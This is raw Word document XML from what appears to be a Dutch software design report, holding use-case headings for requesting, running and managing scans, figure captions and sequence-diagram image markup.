                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4192905" cy="3599815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E12C95">
        <w:t xml:space="preserve">UC-2: </w:t>
      </w:r>
      <w:r w:rsidR="00EC1532">
        <w:t>Aanvraag scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E773177" w14:textId="34FBA896" w:rsidR="00540204" w:rsidRPr="00B10045" w:rsidRDefault="00F11883" w:rsidP="00540204">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252043264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C068355" wp14:editId="6D02E5E8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>179705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3709670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4192905" cy="116840"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="18783"/>
                    <wp:lineTo x="21459" y="18783"/>
                    <wp:lineTo x="21459" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="531" name="Text Box 531"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4192905" cy="116840"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1A973FBA" w14:textId="7BF68E70" w:rsidR="00CE4BB5" w:rsidRPr="00332886" w:rsidRDefault="00CE4BB5" w:rsidP="000B0AB0">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 5.5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068355" id="Text Box 531" o:spid="_x0000_s1118" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:14.15pt;margin-top:292.1pt;width:330.15pt;height:9.2pt;z-index:252043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0yZuzsCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFTfb9owEH6ftP/B8vsIYaWiEaFiVEyTUFsJ&#10;pj4bxyGWbJ9nGxL21+/sENp1e5r24pzvzvfj++4yv++0IifhvART0nw0pkQYDpU0h5J+360/zSjx&#10;gZmKKTCipGfh6f3i44d5awsxgQZUJRzBIMYXrS1pE4ItsszzRmjmR2CFQWMNTrOAV3fIKsdajK5V&#10;NhmPb7MWXGUdcOE9ah96I12k+HUteHiqay8CUSXF2kI6XTr38cwWc1YcHLON5Jcy2D9UoZk0mPQa&#10;6oEFRo5O/hFKS+7AQx1GHHQGdS25SD1gN/n4XTfbhlmRekFwvL3C5P9fWP54enZEViWdfs4pMUwj&#10;STvRBfIFOhJ1iFBrfYGOW4uuoUMDMj3oPSpj413tdPxiSwTtiPX5im8Mx1F5k99N7sZTSjja8vx2&#10;dpMIyF5fW+fDVwGaRKGkDvlLsLLTxgesBF0Hl5jMg5LVWioVL9GwUo6cGHLdNjKIWCO++M1Lmehr&#10;IL7qzb1GpGG5ZIkN941FKXT7LkE0mw5d76E6IxgO+oHylq8lpt8wH56ZwwnC/nErwhMetYK2pHCR&#10;KGnA/fybPvojsWilpMWJLKn/cWROUKK+GaQ8ju8guEHYD4I56hVg40giVpNEfOCCGsTagX7BZVnG&#10;LGhihmOukoZBXIV+L3DZuFgukxMOqWVhY7aWx9ADzLvuhTl7ISkgvY8wzCor3nHV+/agL48BapmI&#10;jMD2KCJH8YIDnti6LGPcoLf35PX6y1j8AgAA//8DAFBLAwQUAAYACAAAACEAW7s63d8AAAAKAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMAyG70i8Q2QkLoilBIiirukEG9zgsDHtnDVZW9E4VZOu&#10;3dtjTnCz5U+/v79Yzb5jZzfENqCGh0UGzGEVbIu1hv3X+70CFpNBa7qATsPFRViV11eFyW2YcOvO&#10;u1QzCsGYGw1NSn3Oeawa501chN4h3U5h8CbROtTcDmaicN9xkWWSe9MifWhM79aNq753o9cgN8M4&#10;bXF9t9m/fZjPvhaH18tB69ub+WUJLLk5/cHwq0/qUJLTMYxoI+s0CPVIpIZn9SSAESCVksCONGRC&#10;Ai8L/r9C+QMAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAA&#10;AAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCrTJm7OwIAAHoEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBbuzrd3wAAAAoBAAAPAAAA&#10;AAAAAAAAAAAAAJMEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1A973FBA" w14:textId="7BF68E70" w:rsidR="00CE4BB5" w:rsidRPr="00332886" w:rsidRDefault="00CE4BB5" w:rsidP="000B0AB0">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 5.5</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2430C540" w14:textId="2311C003" w:rsidR="00555D30" w:rsidRDefault="00555D30" w:rsidP="001424EB"/>
    <w:p w14:paraId="3CAF710A" w14:textId="35B14628" w:rsidR="00EB395B" w:rsidRDefault="004B1B34" w:rsidP="001424EB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252049408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40443C70" wp14:editId="14A0BD2C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4112895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4250690" cy="191135"/>
                <wp:effectExtent l="0" t="0" r="0" b="12065"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="20093"/>
                    <wp:lineTo x="21426" y="20093"/>
                    <wp:lineTo x="21426" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="527" name="Text Box 527"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4250690" cy="191135"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0ED4218D" w14:textId="222CE2E4" w:rsidR="004B1B34" w:rsidRPr="004935B8" w:rsidRDefault="004B1B34" w:rsidP="004B1B34">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 5.6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443C70" id="Text Box 527" o:spid="_x0000_s1119" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.85pt;margin-top:323.85pt;width:334.7pt;height:15.05pt;z-index:252049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b8vTkCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X2EsMFaRKgYFdMk1FaC&#10;qc/GsYklx+fZhoT9+p2dhHbdnqa9mPPd+bt8392xuGtrTc7CeQWmoPloTIkwHEpljgX9vt98uKHE&#10;B2ZKpsGIgl6Ep3fL9+8WjZ2LCVSgS+EIghg/b2xBqxDsPMs8r0TN/AisMBiU4GoW8OqOWelYg+i1&#10;zibj8SxrwJXWARfeo/e+C9JlwpdS8PAopReB6ILit4V0unQe4pktF2x+dMxWivefwf7hK2qmDBa9&#10;Qt2zwMjJqT+gasUdeJBhxKHOQErFReKAbPLxGza7ilmRuKA43l5l8v8Plj+cnxxRZUGnk8+UGFZj&#10;k/aiDeQLtCT6UKHG+jkm7iymhhYD2OnB79EZibfS1fEXKRGMo9aXq74RjqPz02Q6nt1iiGMsv83z&#10;j9MIk728ts6HrwJqEo2COuxfkpWdtz50qUNKLOZBq3KjtI6XGFhrR84Me91UKoge/LcsbWKugfiq&#10;A+w8Ig1LXyUS7ohFK7SHNkl0MxtYH6C8oBgOuoHylm8Ult8yH56YwwlCkrgV4REPqaEpKPQWJRW4&#10;n3/zx3xsLEYpaXAiC+p/nJgTlOhvBlsex3cw3GAcBsOc6jUg8Rz3zfJk4gMX9GBKB/UzLssqVsEQ&#10;MxxrFTQM5jp0e4HLxsVqlZJwSC0LW7OzPEIPMu/bZ+Zs36SA7X2AYVbZ/E2vutxO9NUpgFSpkVHY&#10;TkUcgHjBAU+j0C9j3KDX95T18pex/AUAAP//AwBQSwMEFAAGAAgAAAAhAK0De83eAAAACgEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJC5oSzehdipNJ9jgBoeNaeesMW1F41RJunZv&#10;j3dit9/yp8+/i/VkO3FGH1pHChbzBARS5UxLtYLD98dsBSJETUZ3jlDBBQOsy/u7QufGjbTD8z7W&#10;giUUcq2gibHPpQxVg1aHueuRePfjvNWRR19L4/XIctvJZZKk0uqW+EKje9w0WP3uB6sg3fph3NHm&#10;aXt4/9Rffb08vl2OSj0+TK8vICJO8R+Ga32uDiV3OrmBTBCdgtkiY5JdzxkHBtL0Gk4csmwFsizk&#10;7QvlHwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAA&#10;AAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQC3dvy9OQIAAHoEAAAOAAAAAAAAAAAA&#10;AAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCtA3vN3gAAAAoBAAAPAAAAAAAA&#10;AAAAAAAAAJEEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnAUAAAAA&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0ED4218D" w14:textId="222CE2E4" w:rsidR="004B1B34" w:rsidRPr="004935B8" w:rsidRDefault="004B1B34" w:rsidP="004B1B34">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 5.6</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252044288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="169C4D4F" wp14:editId="6CDD3E0D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-13970</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>242570</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4250690" cy="3899535"/>
            <wp:effectExtent l="0" t="0" r="0" b="12065"/>
            <wp:wrapTopAndBottom/>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Sequence_diagram_UC3.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4250690" cy="3899535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F41AAC">
        <w:t>UC-3: voer scan opdracht uit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F45A0" w14:textId="1A7F5AC9" w:rsidR="001424EB" w:rsidRDefault="00C16A0E" w:rsidP="001424EB">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252045312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A399A94" wp14:editId="52D3198F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>306705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3924935" cy="3402965"/>
            <wp:effectExtent l="0" t="0" r="12065" b="635"/>
            <wp:wrapTopAndBottom/>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Sequence_diagram_UC4.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3924935" cy="3402965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00222191">
        <w:t xml:space="preserve">UC-4: </w:t>
      </w:r>
      <w:r w:rsidR="005B43AB">
        <w:t>Beheren van scans en rapporten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4839FA77" w14:textId="22CAA2C5" w:rsidR="005B43AB" w:rsidRDefault="004B1B34" w:rsidP="001424EB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252047360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D6E95F9" wp14:editId="613E19E1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3455670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3924935" cy="142240"/>
                <wp:effectExtent l="0" t="0" r="12065" b="10160"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="19286"/>
                    <wp:lineTo x="21527" y="19286"/>
                    <wp:lineTo x="21527" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="526" name="Text Box 526"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3924935" cy="142240"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6C3CD6B8" w14:textId="793971DB" w:rsidR="004B1B34" w:rsidRPr="002A4EDD" w:rsidRDefault="004B1B34" w:rsidP="004B1B34">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 5.7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6E95F9" id="Text Box 526" o:spid="_x0000_s1120" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:.15pt;margin-top:272.1pt;width:309.05pt;height:11.2pt;z-index:252047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jWcjwCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRNb9swDL0P2H8QdF+cuGnXGnGKLEWGAUFb&#10;IBl6VmQpFiCLmqTEzn79KDlOu26nYReZIil+vEd6dt81mhyF8wpMSSejMSXCcKiU2Zf0+3b16ZYS&#10;H5ipmAYjSnoSnt7PP36YtbYQOdSgK+EIBjG+aG1J6xBskWWe16JhfgRWGDRKcA0LeHX7rHKsxeiN&#10;zvLx+CZrwVXWARfeo/ahN9J5ii+l4OFJSi8C0SXF2kI6XTp38czmM1bsHbO14ucy2D9U0TBlMOkl&#10;1AMLjByc+iNUo7gDDzKMODQZSKm4SD1gN5Pxu242NbMi9YLgeHuByf+/sPzx+OyIqkp6nd9QYliD&#10;JG1FF8gX6EjUIUKt9QU6biy6hg4NyPSg96iMjXfSNfGLLRG0I9anC74xHEfl1V0+vbu6poSjbTLN&#10;82kiIHt9bZ0PXwU0JAoldchfgpUd1z5gJeg6uMRkHrSqVkrreImGpXbkyJDrtlZBxBrxxW9e2kRf&#10;A/FVb+41Ig3LOUtsuG8sSqHbdQmi289D1zuoTgiGg36gvOUrhenXzIdn5nCCsH/civCEh9TQlhTO&#10;EiU1uJ9/00d/JBatlLQ4kSX1Pw7MCUr0N4OUx/EdBDcIu0Ewh2YJ2PgE983yJOIDF/QgSgfNCy7L&#10;ImZBEzMcc5U0DOIy9HuBy8bFYpGccEgtC2uzsTyGHmDedi/M2TNJAel9hGFWWfGOq963B31xCCBV&#10;IjIC26OIHMULDnhi67yMcYPe3pPX6y9j/gsAAP//AwBQSwMEFAAGAAgAAAAhAAW/KITeAAAACAEA&#10;AA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SFwQdRqCVYU4FbRwg0NL1fM2NklEvI5i&#10;p0n/nuUEx9kZzbwt1rPrxNkOofWkYblIQFiqvGmp1nD4fLtfgQgRyWDnyWq42ADr8vqqwNz4iXb2&#10;vI+14BIKOWpoYuxzKUPVWIdh4XtL7H35wWFkOdTSDDhxuetkmiRKOmyJFxrs7aax1fd+dBrUdhin&#10;HW3utofXd/zo6/T4cjlqfXszPz+BiHaOf2H4xWd0KJnp5EcyQXQaHjin4THLUhBsq+UqA3Hii1IK&#10;ZFnI/w+UPwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAA&#10;AAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAPCNZyPAIAAHoEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAFvyiE3gAAAAgBAAAPAAAA&#10;AAAAAAAAAAAAAJQEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6C3CD6B8" w14:textId="793971DB" w:rsidR="004B1B34" w:rsidRPr="002A4EDD" w:rsidRDefault="004B1B34" w:rsidP="004B1B34">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 5.7</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B9947D" w14:textId="0E524BE2" w:rsidR="004A79D2" w:rsidRPr="00005313" w:rsidRDefault="004A79D2" w:rsidP="00005313">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="038E97AA" w14:textId="4A01AC54" w:rsidR="007C5162" w:rsidRDefault="007C5162" w:rsidP="00FC5C89">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B45EA99" w14:textId="6947D3A0" w:rsidR="007765DF" w:rsidRDefault="007765DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Samenvatting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6992089B" w14:textId="182DC849" w:rsidR="006E6370" w:rsidRPr="000E0169" w:rsidRDefault="003075A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251799552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F696420" wp14:editId="02E252E2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4022090</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>397510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1257300" cy="2057400"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21818" y="21600"/>
                    <wp:lineTo x="21818" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="39" name="Rectangle 39"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1257300" cy="20574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DB5067B" id="Rectangle 39" o:spid="_x0000_s1026" style="position:absolute;margin-left:316.7pt;margin-top:31.3pt;width:99pt;height:162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AtVZwCAADSBQAADgAAAGRycy9lMm9Eb2MueG1srFRRTxsxDH6ftP8Q5X3ctbQDKq6oAjFNQoCA&#10;iec0l/Qi5eIsSXvtfv2c5HoUxqZp2ksuju3P9ne2zy+2rSYb4bwCU9HRUUmJMBxqZVYV/fZ0/emU&#10;Eh+YqZkGIyq6E55ezD9+OO/sTIyhAV0LRxDE+FlnK9qEYGdF4XkjWuaPwAqDSgmuZQFFtypqxzpE&#10;b3UxLsvPRQeutg648B5fr7KSzhO+lIKHOym9CERXFHML6XTpXMazmJ+z2cox2yjep8H+IYuWKYNB&#10;B6grFhhZO/ULVKu4Aw8yHHFoC5BScZFqwGpG5ZtqHhtmRaoFyfF2oMn/P1h+u7l3RNUVPT6jxLAW&#10;/9EDssbMSguCb0hQZ/0M7R7tveslj9dY7Va6Nn6xDrJNpO4GUsU2EI6Po/H05LhE7jnqxuX0ZIIC&#10;4hQv7tb58EVAS+Klog7jJzLZ5saHbLo3idE8aFVfK62TEDtFXGpHNgz/8XI1zq7aNiw/YfAhYuqr&#10;aJ3ivwLS5m+wczYHjlhG9CwiSZmWdAs7LSKeNg9CIr9IRE5syCAnxzgXJoxSzr5htcjP09/mnAAj&#10;skQCBuwe4DUXe+ycc28fXUUajMG5zNH/5Dx4pMhgwuDcKgPuPQCNVfWRs/2epExNZGkJ9Q67z0Ee&#10;S2/5tcIOuGE+3DOHc4hdg7sl3OEhNXQVhf5GSQPux3vv0R7HA7WUdDjXFfXf18wJSvRXg4NzNppM&#10;4iJIwmR6MkbBHWqWhxqzbi8B22qEW8zydI32Qe+v0kH7jCtoEaOiihmOsSvKg9sLlyHvG1xiXCwW&#10;yQyH37JwYx4tj+CR1djhT9tn5mw/BgEn6Bb2O4DN3kxDto2eBhbrAFKlUXnhtecbF0dq9n7Jxc10&#10;KCerl1U8/wkAAP//AwBQSwMEFAAGAAgAAAAhADmqj13eAAAACgEAAA8AAABkcnMvZG93bnJldi54&#10;bWxMj01PwzAMhu9I/IfISNxYuhaiqjSdAAkuiMMGbNesMW1F45Qm3bp/jzmNmz8evX5crmbXiwOO&#10;ofOkYblIQCDV3nbUaPh4f77JQYRoyJreE2o4YYBVdXlRmsL6I63xsImN4BAKhdHQxjgUUoa6RWfC&#10;wg9IvPvyozOR27GRdjRHDne9TJNESWc64gutGfCpxfp7MzkNdf72Gh7n6bN/QTTp7s79nNZbra+v&#10;5od7EBHneIbhT5/VoWKnvZ/IBtFrUFl2yygXqQLBQJ4tebDXkOVKgaxK+f+F6hcAAP//AwBQSwE